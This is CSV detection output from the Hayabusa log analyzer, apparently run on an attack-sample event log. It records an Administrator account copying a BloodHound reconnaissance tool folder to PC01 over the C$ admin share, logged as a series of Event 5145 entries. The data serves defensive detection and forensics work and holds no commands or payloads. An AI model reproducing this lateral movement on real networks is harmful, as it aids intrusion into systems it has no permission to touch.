2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
